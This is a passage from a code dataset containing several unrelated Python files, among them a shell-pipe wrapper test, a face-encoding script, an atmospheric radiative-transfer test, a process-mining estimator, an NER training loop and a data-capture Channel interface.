os.path.join(test_dir, 'bin') + ':' + os.environ['PATH']\n        self.shell = Commands()\n\n    def test_path(self):\n        attrs = dir(self.shell)\n        self.assertIn('wc_py', attrs)\n        self.assertIn('eval_py', attrs)\n        self.assertIn('grep_py', attrs)\n        self.assertIn('massedit_py', attrs)\n        self.assertNotIn('noexecfile', attrs)\n\n    def test_math(self):\n        echo = self.shell.echo_py('1+3*4')\n        cmd = echo | self.shell.eval_py()\n        self.assertEqual('13\\n', cmd.getvalue())\n        cmd = echo | self.shell.eval_py() | self.shell.wc_py()\n        self.assertEqual('1\\t1\\t3\\n', cmd.getvalue())\n\n    def test_python(self):\n        from shpipes import Pipe\n\n        py_pipe = Pipe(sys.executable)\n        cmd = py_pipe('-c \"import sys; print(sys.executable)\"')\n        
self.assertEqual(sys.executable + '\\n', cmd.getvalue())\n cmd = py_pipe(sys.executable)('--version')\n version = '%d.%d.%d' % (sys.version_info[0], sys.version_info[1], sys.version_info[2])\n self.assertIn(version, cmd.getvalue())\n\n def test_grep(self):\n cmd = self.shell.grep_py('.+foobarbaz', __file__)\n self.assertEqual(inspect.stack(2)[0].code_context[0], cmd.getvalue())\n\n def test_args(self):\n cmd = self.shell.echo_py('4**4')\n cmd = self.shell.eval_py(cmd.getvalue())\n self.assertEqual('256\\n', cmd.getvalue())\n cmd = self.shell.eval_py(self.shell.echo_py('4**4'))\n self.assertEqual('256\\n', cmd.getvalue())\n\n def test_bin(self):\n cmd = self.shell.echo_py('\"\\xff\\xff\"')\n self.assertEqual('ÿÿ\\n', cmd.getvalue())\n\n\nif __name__ == '__main__':\n unittest.main()\n # self.shell.massedit_py('-e', '''re.sub(r\"^class\", \"classy\", line)''')\n\n#\n# cmd = cmds.find('. -type f')\n# cmd |= cmds.grep(__file__)\n# print(cmds.wc(cmd).getvalue())\n#\n# print(cmd.getvalue())\n#\n# cmd = cmds.echo(\"750/12.5\") | cmds.bc() | cmds.sed(\"'s/$/\\/24/'\") | cmds.bc()\n# print(cmd.getvalue())\n#\n# cmd = Pipe(sys.executable)('-c \"import sys; print(sys.version)\"')\n# print(cmd.getvalue())\n#\n# cmd = cmds.grep('fizzbuzz', __file__)\n# print('G', cmd.getvalue())\n#\n# cmd = cmds.ps('-u $USER -f')\n# cmd |= cmds.grep(__file__)\n# cmd |= cmds.head('-1')\n# print(cmd.getvalue())\n","sub_path":"tests/test_pipes.py","file_name":"test_pipes.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"277445195","text":"#This was inspired by the following articles:\n#https://medium.com/@ageitgey/machine-learning-is-fun-part-4-modern-face-recognition-with-deep-learning-c3cffc121d78\n#file:///Users/ryankarl/Downloads/Face%20recognition%20with%20OpenCV,%20Python,%20and%20deep%20learning%20-%20PyImageSearch.htm\n#http://blog.dlib.net/2017/02/high-quality-face-recognition-with-deep.html\n\n# python encode_faces.py --dataset dataset --encodings encodings.pickle\nfrom imutils import paths\nimport face_recognition\nimport argparse\nimport pickle\nimport cv2\nimport os\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--dataset\", required=True,\n\thelp=\"path to input directory of faces + images\")\nap.add_argument(\"-e\", \"--encodings\", required=True,\n\thelp=\"path to serialized db of facial encodings\")\nap.add_argument(\"-d\", \"--detection-method\", type=str, default=\"cnn\",\n\thelp=\"face detection model to use: either `hog` or `cnn`\")\nargs = vars(ap.parse_args())\n\n#Find path to dataset images\nprint(\"[INFO] quantifying faces...\")\nimagePaths = list(paths.list_images(args[\"dataset\"]))\n\nknownEncodings = []\nknownNames = []\n\n#Loop over the image paths\nfor (i, imagePath) in enumerate(imagePaths):\n\t#Find the name of the individual\n\tprint(\"[INFO] processing image {}/{}\".format(i + 1,\n\t\tlen(imagePaths)))\n\tname = imagePath.split(os.path.sep)[-2]\n\n\t# Convert the image from BGR to dlib RGB\n\timage = cv2.imread(imagePath)\n\trgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t#Find the coordinates of the bounding boxes for each face in the input image\n\tboxes = face_recognition.face_locations(rgb,\n\t\tmodel=args[\"detection_method\"])\n\n\t#Compute the embedding for the face\n\tencodings = face_recognition.face_encodings(rgb, boxes)\n\n\t#Add each encoding and name to the set of known names and encodings\n\tfor encoding in 
encodings:\n\t\t\n\t\tknownEncodings.append(encoding)\n\t\tknownNames.append(name)\n\n#Save to disk\nprint(\"[INFO] serializing encodings...\")\ndata = {\"encodings\": knownEncodings, \"names\": knownNames}\nf = open(args[\"encodings\"], \"wb\")\nf.write(pickle.dumps(data))\nf.close()\n","sub_path":"encode_faces.py","file_name":"encode_faces.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"13990584","text":"\"\"\"\n610. Two Sum - Difference equals to target\nhttps://www.lintcode.com/problem/two-sum-difference-equals-to-target/description\ntwo pointer. same direction\n\"\"\"\nclass Solution:\n \"\"\"\n @param nums: an array of Integer\n @param target: an integer\n @return: [num1, num2] (num1 < num2)\n \"\"\"\n def twoSum7(self, nums, target):\n if not nums or len(nums) < 2:\n return -1, -1\n n = len(nums)\n target = abs(target)\n\n j = 0\n for i in range(n):\n j = max(j, i + 1)\n while j < n and nums[j] - nums[i] < target:\n j += 1\n if j >= n:\n break\n if nums[j] - nums[i] == target:\n return nums[i], nums[j]\n\n return -1, -1\n","sub_path":"lintcode/610.1.py","file_name":"610.1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"116953521","text":"#!/usr/bin/env python3\n\n\"\"\"\n Does some simple calculations to test trace gas PACE calculations\n\n Adapted from benchmark4Amir.py\n Patricia Castellanos, April 2020\n\n\"\"\"\n\nimport os\nimport sys\nfrom netCDF4 import Dataset\nfrom netCDF4 import Dataset as ncread\nimport numpy as np\nfrom MAPL.constants import *\nfrom py_leo_vlidort import VLIDORT_POLAR_\nfrom scipy.interpolate import interp1d\nimport scipy.integrate as integrate\nfrom pyhdf.SD import SD, SDC\nfrom multiprocessing import Pool\n\nfrom hyperTest_o3 import get_channels,get_geom,get_ROT,get_TOA_unpack,get_TOA\nfrom hyperTest_o3 import get_PTWV_profile, get_o3_profile, writenc\n\nformat = 'NETCDF4_CLASSIC'\nMISSING = -1.e+20\n\n\ndef get_kg(inFile):\n \"\"\"\n Read c-k distribution coefficients from Amir's calculations\n \"\"\"\n nc = Dataset(inFile)\n # wavelength [nm]\n wav_abs = np.array(nc.variables['wavelengths'][:])\n # c-k coefficients [not sure about units]\n kg_o2 = nc.variables['kg_o2'][:].T\n kg_h2o = nc.variables['kg_h2o'][:].T\n kg_co = nc.variables['kg_co'][:].T\n kg_co2 = nc.variables['kg_co2'][:].T\n kg_ch4 = nc.variables['kg_ch4'][:].T\n kg_n2o = nc.variables['kg_n2o'][:].T\n g_bins = nc.variables['g_bins'][:]\n\n nc.close()\n\n return kg_o2, kg_h2o, kg_co, kg_co2, kg_ch4, kg_n2o, g_bins, wav_abs\n\ndef get_alpha(A,VMR,rhoe,ze):\n \"\"\"\n Calculate Absorption optical depth profile\n A - absorption coefficient [m2/molecule]\n VMR - trace gas mixing ratio [vol/vol, dimensionless]\n rhoe - air number density [molecules/m3]\n ze - profile altitude [m]\n \"\"\"\n\n # convert vmr to molecules/m3\n nxe = VMR*rhoe\n\n # integrate to get the optical depth subcolumns\n km, nbin, nch = A.shape\n alpha = np.zeros([km,nbin,nch])\n for i in range(km):\n for b in range(nbin):\n c1 = A[i,b,:]*nxe[i]\n c2 = A[i,b,:]*nxe[i+1]\n c1.shape = (1, nch)\n c2.shape = (1, nch)\n c = np.append(c1,c2,axis=0)\n alpha[i,b,:] = np.trapz(c,ze[i:i+2],axis=0)\n\n #alpha = np.trapz(A*nxe,ze)\n\n return alpha\n\ndef get_abs_o3_ck(inFile,te):\n \"\"\"\n get o3 xsection \n use values interpolated to ck-bins\n interpolate to temp profile te\n units m2/molecule\n \"\"\"\n # ck interpolated xsec\n nc 
= Dataset(inFile)\n xsec_ck = nc.variables['xsec_o3_ck'][:]\n temp = nc.variables['temp'][:]\n nc.close()\n\n # get xsecstion for te temperature profile\n xsec_f = interp1d(temp,xsec_ck,kind='linear',fill_value='extrapolate')\n\n # dimensions ke,nwav\n xsec_int = xsec_f(te).T\n\n # convert from cm2/molecule to m2/molecule\n xsec_int = xsec_int*1e-4\n\n return xsec_int\n\ndef get_abs_o3_rsr(inFile,te):\n \"\"\"\n get o3 xsection\n use values that are RSR weighted\n interpolate to temp profile te\n units m2/molecule\n \"\"\"\n # rsr weighted xsec\n nc = Dataset(inFile)\n wav_rsr = np.array(nc.variables['wav_oci'][:])\n xsec_rsr = nc.variables['xsec_o3_rsr'][:]\n temp = nc.variables['temp'][:]\n nc.close()\n\n # get xsecstion for te temperature profile\n xsec_f = interp1d(temp,xsec_rsr,kind='linear',fill_value='extrapolate')\n\n # dimensions ke,nwav\n xsec_int = xsec_f(te).T\n\n # convert from cm2/molecule to m2/molecule\n xsec_int = xsec_int*1e-4\n\n return wav_rsr,xsec_int\n#------------------------------------ M A I N ------------------------------------\n\nif __name__ == \"__main__\":\n\n outRoot = 'hyperTest/'\n outFile = '{}/outputs/hyperTest_CK_Thuillier_o3.nc4'.format(outRoot)\n\n # Pressure [Pa], temperature [K], height [m], water vapor [ppm] profile - standard atmosphere\n # used to make OCI look up tables\n inFile = '{}/atrem_tpvmr.nc'.format(outRoot)\n km, pe, te, ze, rhoe, h2oe, DP = get_PTWV_profile(inFile)\n\n # Read in Amir's c-k distribution coefficients wavelengths\n # kg has dimensions km,ngbins,nwav. ngbins = 10\n inFile = 'correlated_k/kg_gas.nc'\n kg_o2, kg_h2o, kg_co, kg_co2, kg_ch4, kg_n2o, g_bins, wav_abs = get_kg(inFile)\n ngbin = len(g_bins)\n\n # convert kg from pressure space to z space\n # ---------------------------------------------------\n Q = 2.15199993E+25\n C = (Q*28.966) / 6.0225e23 / 1e-6\n\n # integrate air density in each layer\n rhoint = np.zeros(km)\n for i in range(km):\n rhoint[i] = np.trapz(rhoe[i:i+2],ze[i:i+2])\n\n DP.shape = (km,1,1)\n rhoint.shape = (km,1,1) \n\n for ibin in range(ngbin-1):\n DP = np.append(DP,DP[:,0:1,:],axis=1)\n rhoint = np.append(rhoint,rhoint[:,0:1,:],axis=1)\n kg_o2_z = kg_o2*C*DP/rhoint\n kg_co_z = kg_co*C*DP/rhoint\n kg_co2_z = kg_co2*C*DP/rhoint\n kg_ch4_z = kg_ch4*C*DP/rhoint\n kg_n2o_z = kg_n2o*C*DP/rhoint\n kg_h2o_z = kg_h2o*C*DP/rhoint\n\n # get absorption optical depth with new aborption coefficient\n co_vmr = 0.1*1e-6\n alpha_co = get_alpha(kg_co_z,co_vmr,rhoe,ze)\n \n o2_vmr = 0.21\n alpha_o2 = get_alpha(kg_o2_z,o2_vmr,rhoe,ze)\n\n co2_vmr = 400.*1.0E-06\n alpha_co2 = get_alpha(kg_co2_z,co2_vmr,rhoe,ze)\n\n ch4_vmr = 1.8*1.0E-06\n alpha_ch4 = get_alpha(kg_ch4_z,ch4_vmr,rhoe,ze)\n\n n2o_vmr = 0.3*1.0E-06\n alpha_n2o = get_alpha(kg_n2o_z,n2o_vmr,rhoe,ze)\n\n \n # scale water vapor so total precipitable water \n # is equal to 1 cm\n # ----------------\n\n # first calculate water vapor column [molecules/m2]\n h2ocol = np.trapz(h2oe*1e-6*rhoe,ze)\n # normalize profile so water vapor column expressed as total precipitable water is equal to 1 cm \n # use 1 mm of rainfall = 1 kg/m2\n # or 1 cm = 10 kg/m2\n # 10 kg/m2 is equal to 3.34e22 water molecules/cm2\n h2ocolnew = 3.34e22\n # convert to meters\n h2ocolnew = h2ocolnew*1e4\n \n h2oenew = h2oe*(h2ocolnew/h2ocol)\n # get in vmr units\n h2oe_vmr = 1e-6*h2oenew\n alpha_h2o = get_alpha(kg_h2o_z,h2oe_vmr,rhoe,ze)\n\n # add up all the alphas\n alpha = alpha_h2o + alpha_n2o + alpha_ch4 + alpha_co2 + alpha_o2 + alpha_co\n\n # ----\n # OZONE Stuff\n # ---\n # Read in mcclams 
ozone mixing ratio profile [unitless]\n inFile = '{}/mcclams.dat'.format(outRoot)\n z_o3, o3_vmr = get_o3_profile(inFile)\n\n # interpolate o3_vmr to PT profile\n o3_f = interp1d(z_o3,o3_vmr,kind='linear',fill_value=\"extrapolate\")\n o3_vmre = o3_f(ze)\n\n # Read in ozone cross sections\n # use xsecs interpolated to CK bins\n # also interpolated to te profile\n inFile = '{}/o3_bremen/xsec_o3_ck_bins_V0.nc'.format(outRoot)\n abs_o3_z = get_abs_o3_ck(inFile,te)\n \n # integrate conc_o3*xsec_o3 to get o3 alpha\n nwav = len(wav_abs)\n alpha_o3 = np.zeros([km,nwav])\n for i in range(km):\n o3_conc = o3_vmre[i:i+2]*rhoe[i:i+2]\n o3_conc.shape = (2,1)\n alpha_o3[i,:] = np.trapz(o3_conc*abs_o3_z[i:i+2,:],ze[i:i+2],axis=0)\n \n sys.exit()\n # add ozone to total alpha\n # extend array down to uv\n for ibin in range(ngbin):\n alpha[:,ibin,:] = alpha[:,ibin,:] + alpha_o3\n all_wl = wav_abs\n\n # flip everything vertically so going from top of atmosphere to surface\n pe = pe[-1::-1]\n te = te[-1::-1]\n ze = ze[-1::-1]\n alpha = alpha[-1::-1,:,:]\n\n # add dimension to be in km+1,nobs\n pe.shape = (km+1,1)\n te.shape = (km+1,1)\n ze.shape = (km+1,1)\n\n\n # read in granule geometry\n Iscan = 600\n Icross = 1000\n SZA,VZA,RAA,SAA,VAA = get_geom(Iscan,Icross)\n\n \n # Read in solar irradiance spectrum\n # second dim = wavelength, irradiance\n # units=nm, uW/cm^2/nm\n inFile = '{}/Thuillier_F0.npy'.format(outRoot)\n F0 = np.load(inFile) \n # interpolate to c-k wavelength bins\n F0_f = interp1d(F0[:,0],F0[:,1],kind='linear',fill_value=\"extrapolate\")\n F0_int = F0_f(all_wl)\n\n # set up some vlidort stuff\n albedoType = 'OCIGissCX'\n U10m = np.array([3.0])\n V10m = np.array([4.0])\n mr = 1.334\n nstreams = 12\n\n # loop through channels\n nproc = 20\n nwl = len(all_wl)\n# nwl = 2\n\n args = []\n ROD = []\n depol = []\n for ich in np.arange(nwl):\n ch = all_wl[ich]\n\n # Get Rayleigh\n ROT, depol_ratio = get_ROT(ch,pe,te,ze,verbose=False) \n ROD.append(np.squeeze(ROT.sum(axis=0)))\n depol.append(depol_ratio)\n\n for ibin in range(ngbin-1):\n ROT = np.append(ROT,ROT[:,:,0:1],axis=2)\n depol_ratio = np.append(depol_ratio,depol_ratio[0:1])\n \n # trace gas\n alpha_ch = alpha[:,:,ich]\n alpha_ch.shape = (km,1,ngbin)\n\n # AOP vectors [km,nch,nobs]\n tau = np.zeros([km,ngbin,1])\n ssa = np.zeros([km,ngbin,1])\n pmom = np.zeros([km,ngbin,1,30,6])\n \n # water refractive index\n mr_in = np.ones(ngbin)\n mr_in = mr_in*mr\n\n # solar irradiance\n F0_in = F0_int[ich]\n F0_in = np.repeat(F0_in,ngbin)\n F0_in.shape = (ngbin,1)\n\n ch = np.repeat(ch,ngbin)\n args.append([ch,\n F0_in,\n ROT,depol_ratio,\n tau,ssa,pmom,\n alpha_ch,\n SZA,VZA,RAA,\n km,pe,te,ze,\n nstreams,\n albedoType,\n U10m,V10m,mr_in,\n False])\n\n# I,reflectance,BR = get_TOA(ch,\n# ROT,depol_ratio,\n# tau,ssa,pmom,\n# alpha_ch,\n# SZA,VZA,RAA,\n# km,pe,te,ze,\n# nstreams,\n# albedoType,\n# U10m=U10m,V10m=V10m,mr=np.array([1.334]),\n# verbose=False)\n\n\n\n # use multiprocessing\n p = Pool(nproc)\n result = p.map(get_TOA_unpack,args)\n I = []\n reflectance = []\n BR = []\n for r in result: \n I_r,reflectance_r,BR_r = r\n I.append(np.squeeze(I_r))\n reflectance.append(np.squeeze(reflectance_r))\n BR.append(np.squeeze(BR_r))\n\n p.close()\n p.join()\n \n # convert to arrays with dimensions nwav,ngbin\n ROD = np.array(ROD) \n depol_ratio = np.array(depol)\n\n I = np.array(I)\n reflectance = np.array(reflectance)\n BR = np.array(BR)\n \n alphaD = alpha.sum(axis=0).T \n\n\n # integrate with g weights to get effective reflectance at each wavelength\n I_eff 
= np.trapz(I,g_bins,axis=1)\n reflectance_eff = np.trapz(reflectance,g_bins,axis=1)\n BR_eff = np.trapz(BR,g_bins,axis=1)\n alphaD_eff = np.trapz(alphaD,g_bins,axis=1)\n\n # write to outFile\n writenc(outFile,all_wl,\n F0_int,\n SZA,SAA,VZA,VAA,\n I_eff,BR_eff,reflectance_eff,\n ROD,depol_ratio,\n alphaD_eff,\n pe,te,ze,\n U10m,V10m,mr) \n#\n\n","sub_path":"src/Components/missions/PACE/hyperTest_ck_o3_bremen.py","file_name":"hyperTest_ck_o3_bremen.py","file_ext":"py","file_size_in_byte":10889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"188539830","text":"import os\nimport pandas as pd\nimport datetime\nimport numpy as np\nimport math\nfrom sklearn.cluster import KMeans\n\n# Method for transforming events into horizontal format.\ndef transform_event_data(df):\n case = None\n data = {}\n for index, row in df.iterrows():\n if case != row['case concept:name']:\n case = row['case concept:name']\n if case not in data.keys():\n data[case] = []\n data[case].append(float(row['event concept:name']))\n df = pd.DataFrame.from_dict(data, orient='index')\n return df, len(df.columns)\n\n\ndef to_seconds(x):\n return x.total_seconds()\n\n\nname = 'Road_Traffic_Fine_Management_Process'\ntest_df = pd.read_pickle(name + 'predicted.dat')\ntrain_df = pd.read_pickle(name + 'extra-columns.dat')\n\nevent_data_train, max_event = transform_event_data(train_df)\nevent_data_test, amount = transform_event_data(test_df)\n\n# Calculating means per event type per cluster for train set:\nclustering = KMeans(random_state=0)\nevent_data_train['cluster'] = clustering.fit_predict(event_data_train.fillna(0))\ntrain_df.index = train_df['case concept:name']\ntrain_df['cluster'] = event_data_train['cluster']\ntrain_means = pd.DataFrame(train_df.groupby('case concept:name')['time-to-end'].max())\ntrain_means['cluster'] = event_data_train['cluster']\n\n# Making the test set of the right event length:\nfor i in range(amount, amount + (max_event - amount), 1):\n event_data_test[i] = np.nan\n\n# Predict cluster on test set and use means per event type and per cluster as estimator:\nevent_data_test['cluster'] = clustering.predict(event_data_test.fillna(0))\ntest_df.index = test_df['case concept:name']\ntest_df['cluster'] = event_data_test['cluster']\nfor cluster in list(train_means.groupby('cluster').mean().index):\n test_df.loc[test_df['cluster'] == cluster, 'estimator2'] = float(train_means.groupby('cluster').mean().loc[cluster])\ntest_df['estimator2'] = test_df['estimator2'] - test_df['inter-event-time']\n\n# Calculate the error:\nprint(\n math.sqrt(sum((test_df['time-to-end'] - test_df['estimator2']).apply(lambda x: x ** 2)) / len(test_df)) / 3600 / 24)\n\n# Save data again:\ntest_df.to_pickle(name + 'predicted.dat')\ntrain_df.to_pickle(name + 'extra-columns.dat')\n","sub_path":"estimators.py","file_name":"estimators.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252481228","text":"import glob\nimport os.path as path\n\nimport pkbar\nimport torch\n\nfrom constants import *\n\n\ndef padding(sents, pad_idx, device):\n lengths = [len(sent) for sent in sents]\n max_len = lengths[0]\n padded_data = []\n for s in sents:\n padded_data.append(s.tolist() + [pad_idx] * (max_len - len(s)))\n return torch.tensor(padded_data, device=device), lengths\n\n\ndef train_epoch(model, optimizer, criterion, train_dataset, device, probar):\n model.train()\n model = model.to(device)\n\n 
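In the PACE hyperTest record above, per-wavelength results carried across the correlated-k g-bins are collapsed into one effective value with np.trapz(..., g_bins, axis=1). A tiny self-contained check of that reduction on toy numbers (not the script's data): integrating a g-independent quantity over g in [0, 1] should return it unchanged.

import numpy as np

# 3 wavelengths x 5 g-bins of toy radiances; g-bins span [0, 1]
g_bins = np.linspace(0.0, 1.0, 5)
I = np.outer([1.0, 2.0, 3.0], np.ones(5))

I_eff = np.trapz(I, g_bins, axis=1)
print(I_eff)  # [1. 2. 3.] -- constants survive the g-integration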
epoch_loss = 0\n\n for idx, (sentences, tags) in enumerate(train_dataset):\n sentences, sent_lengths = padding(sentences, model.sent_vocab.stoi[PAD], device)\n tags, _ = padding(tags, model.tag_vocab.stoi[PAD], device)\n\n optimizer.zero_grad()\n pred = model(sentences, sent_lengths)\n loss = criterion(pred.transpose(1, 2), tags)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.0)\n optimizer.step()\n\n probar.update(idx, values=[('loss', loss),])\n\n epoch_loss += loss.item()\n return epoch_loss / len(train_dataset)\n\ndef evaluate(model, criterion, val_dataset, device):\n model.eval()\n model = model.to(device)\n\n losses = 0\n\n for idx, (sentences, tags) in enumerate(val_dataset):\n sentences, sent_lengths = padding(sentences, model.sent_vocab.stoi[PAD], device)\n tags, _ = padding(tags, model.tag_vocab.stoi[PAD], device)\n\n pred = model(sentences, sent_lengths)\n loss = criterion(pred.transpose(1, 2), tags)\n\n losses += loss.item()\n return losses / len(val_dataset)\n\ndef train(model, optimizer, criterion, writer, train_dataset, val_dataset, device, epochs, checkpoint_folder='./checkpoints', save_freq=1, resume=False):\n start_iter = 0\n if resume:\n model_list = glob.glob(path.join(checkpoint_folder, '*.pt'))\n if len(model_list) != 0:\n model_list.sort(reverse=True)\n start_iter = int(model_list[0].split('_')[-1].split('.')[0])\n model = model.load(path.join(checkpoint_folder, 'ulstm_ner_%s.pt' % start_iter))\n\n batch_per_epoch = len(train_dataset)\n for epoch in range(start_iter+1, epochs+1):\n probar = pkbar.Kbar(target=batch_per_epoch, epoch=epoch-1, num_epochs=epochs, width=30, always_stateful=False)\n train_loss = train_epoch(model, optimizer, criterion, train_dataset, device, probar)\n val_loss = evaluate(model, criterion, val_dataset, device)\n\n probar.add(1, values=[('train_loss', train_loss), ('val_loss', val_loss),])\n writer.add_scalar('training loss',\n train_loss,\n epoch * len(train_dataset) + batch_per_epoch)\n writer.add_scalar('validation loss',\n val_loss,\n epoch * len(val_dataset) + batch_per_epoch)\n if epoch % save_freq == 0:\n model.save(path.join(checkpoint_folder, 'ulstm_ner_%s.pt' % epoch))\n","sub_path":"bi_lstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"501646533","text":"#\n# Copyright (c) 2014, Prometheus Research, LLC\n#\n\n\nfrom rex.core import Extension\n\nfrom ..mixins import Comparable, Displayable, Dictable\nfrom ..util import to_unicode, get_implementation\n\n\n__all__ = (\n 'Channel',\n)\n\n\nclass Channel(Extension, Comparable, Displayable, Dictable):\n \"\"\"\n Represents an Electronic Data Capture system for which a Presentation\n configuration can be defined.\n \"\"\"\n\n PRESENTATION_TYPE_FORM = 'form'\n PRESENTATION_TYPE_SMS = 'sms'\n ALL_PRESENTATION_TYPES = (\n PRESENTATION_TYPE_FORM,\n PRESENTATION_TYPE_SMS,\n )\n\n dict_properties = (\n 'title',\n 'presentation_type',\n )\n\n @classmethod\n def get_by_uid(cls, uid, user=None):\n \"\"\"\n Retrieves a Channel from the datastore using its UID.\n\n Must be implemented by concrete classes.\n\n :param uid: the UID of the Channel to retrieve\n :type uid: string\n :param user: the User who should have access to the desired Channel\n :type user: User\n :raises:\n DataStoreError if there was an error reading from the datastore\n :returns:\n the specified Channel; None if the specified UID does not exist\n :rtype: 
Channel\n \"\"\"\n\n raise NotImplementedError()\n\n @classmethod\n def find(cls, offset=0, limit=None, user=None, **search_criteria):\n \"\"\"\n Returns Channels that match the specified criteria.\n\n ``search_criteria`` for this method will (at a minimum) support:\n\n * title (partial matches)\n * presentation_type (exact matches)\n\n Must be implemented by concrete classes.\n\n :param offset:\n the offset in the list of Channels to start the return set from\n (useful for pagination purposes); if not specified, defaults to 0\n :type offset: int\n :param limit:\n the maximum number of Channels to return (useful for pagination\n purposes); if not specified, defaults to ``None``, which means no\n limit\n :type limit: int\n :param user: the User who should have access to the desired Channels\n :type user: User\n :raises:\n DataStoreError if there was an error reading from the datastore\n :rtype: list of Channels\n \"\"\"\n\n raise NotImplementedError()\n\n @classmethod\n def get_implementation(cls):\n \"\"\"\n Returns the concrete implementation of this class that is activated in\n the currently running application.\n\n :rtype: type\n \"\"\"\n\n return get_implementation('channel')\n\n def __init__(self, uid, title, presentation_type):\n self._uid = to_unicode(uid)\n self._title = to_unicode(title)\n if presentation_type not in Channel.ALL_PRESENTATION_TYPES:\n raise ValueError(\n '\"%s\" is not a valid presentation type' % (presentation_type,)\n )\n self._presentation_type = presentation_type\n\n @property\n def uid(self):\n \"\"\"\n The Unique Identifier that represents this Channel in the datastore.\n Read only.\n\n :rtype: unicode\n \"\"\"\n\n return self._uid\n\n @property\n def title(self):\n \"\"\"\n The human-readable title of the Channel.\n\n :rtype: unicode\n \"\"\"\n\n return self._title\n\n @property\n def presentation_type(self):\n \"\"\"\n The presentation type this Channel handles.\n\n :rtype: unicode\n \"\"\"\n\n return self._presentation_type\n\n def get_instruments(\n self,\n offset=0,\n limit=None,\n user=None,\n **search_criteria):\n \"\"\"\n Returns Instruments that have at least one Presentation configuration\n set up for this Channel.\n\n Must be implemented by concrete classes.\n\n :param offset:\n the offset in the list of Instruments to start the return set from\n (useful for pagination purposes); if not specified, defaults to 0\n :type offset: int\n :param limit:\n the maximum number of Instruments to return (useful for pagination\n purposes); if not specified, defaults to ``None``, which means no\n limit\n :type limit: int\n :param user: the User who should have access to the desired Instruments\n :type user: User\n :raises:\n DataStoreError if there was an error reading from the datastore\n :rtype: list of Instruments\n \"\"\"\n\n raise NotImplementedError()\n\n def get_display_name(self):\n \"\"\"\n Returns a unicode string that represents this object, suitable for use\n in human-visible places.\n\n :rtype: unicode\n \"\"\"\n\n return self.title\n\n def __repr__(self):\n return '%s(%r, %r, %r)' % (\n self.__class__.__name__,\n self.uid,\n self.title,\n self.presentation_type,\n )\n\n","sub_path":"src/rex.instrument/src/rex/instrument/interface/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":4984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"218796860","text":"\"\"\"@package utils\n\nThis package implements useful functions.\n\nCopyright (c) 2020 Nhan H. 
Pham, Department of Statistics and Operations Research, University of North Carolina at Chapel Hill\n\nCopyright (c) 2020 Lam M. Nguyen, IBM Research, Thomas J. Watson Research Center\nYorktown Heights\n\nCopyright (c) 2020 Dzung T. Phan, IBM Research, Thomas J. Watson Research Center\nYorktown Heights\n\nCopyright (c) 2020 Phuong Ha Nguyen, Department of Electrical and Computer Engineering, University of Connecticut\n\nCopyright (c) 2020 Marten van Dijk, Department of Electrical and Computer Engineering, University of Connecticut\n\nCopyright (c) 2020 Quoc Tran-Dinh, Department of Statistics and Operations Research, University of North Carolina at Chapel Hill\nAll rights reserved.\n\nIf you found this helpful and are using it within our software please cite the following publication:\n\n* N. H. Pham, L. M. Nguyen, D. T. Phan, P. H. Nguyen, M. van Dijk and Q. Tran-Dinh, **A Hybrid Stochastic Policy Gradient Algorithm for Reinforcement Learning**, The 23rd International Conference on Artificial Intelligence and Statistics (AISTATS 2020), Palermo, Italy, 2020.\n\n\"\"\"\n\nimport numpy as np\n\ndef extract_path(paths, discount):\n    for path in paths:\n        p_rewards = path[\"rewards\"]\n\n        returns = []\n        return_so_far = 0\n        for t in range(len(p_rewards) - 1, -1, -1):\n            return_so_far = p_rewards[t] + discount * return_so_far\n            returns.append(return_so_far)\n\n        # reverse return array\n        returns = np.array(returns[::-1])\n\n        # add to dict\n        path[\"returns\"] = returns\n\n    # d_rewards_tmp = [p[\"rewards\"] for p in paths]\n    \n    # d_rewards_tmp = calc_discount_rewards(d_rewards_tmp, discount)\n\n    observations = [p[\"observations\"] for p in paths]\n    actions = [p[\"actions\"] for p in paths]\n    d_rewards = [p[\"returns\"] for p in paths]\n\n    # print(d_rewards[0],'\\n',d_rewards_tmp[0])\n\n    return observations, actions, d_rewards\n\ndef prox_l1_norm( w, lamb ):\n    \"\"\"! Compute the proximal operator of the \\f$\\ell_1\\f$ - norm\n\n    \\f$ prox_{\\lambda \\|.\\|_1} = {arg\\min_x}\\left\\{\\|x\\|_1 + \\frac{1}{2\\lambda}\\|x - w\\|^2\\right\\} \\f$\n    \n    Parameters\n    ---------- \n    @param w : input vector\n    @param lamb : penalty parameter\n    \n    Returns\n    ---------- \n    @retval : perform soft - thresholding on input vector\n    \"\"\"\n    return np.sign( w ) * np.maximum( np.abs( w ) - lamb, 0 )\n\ndef prox_l2_square(x, lbd):\n    \"\"\"! 
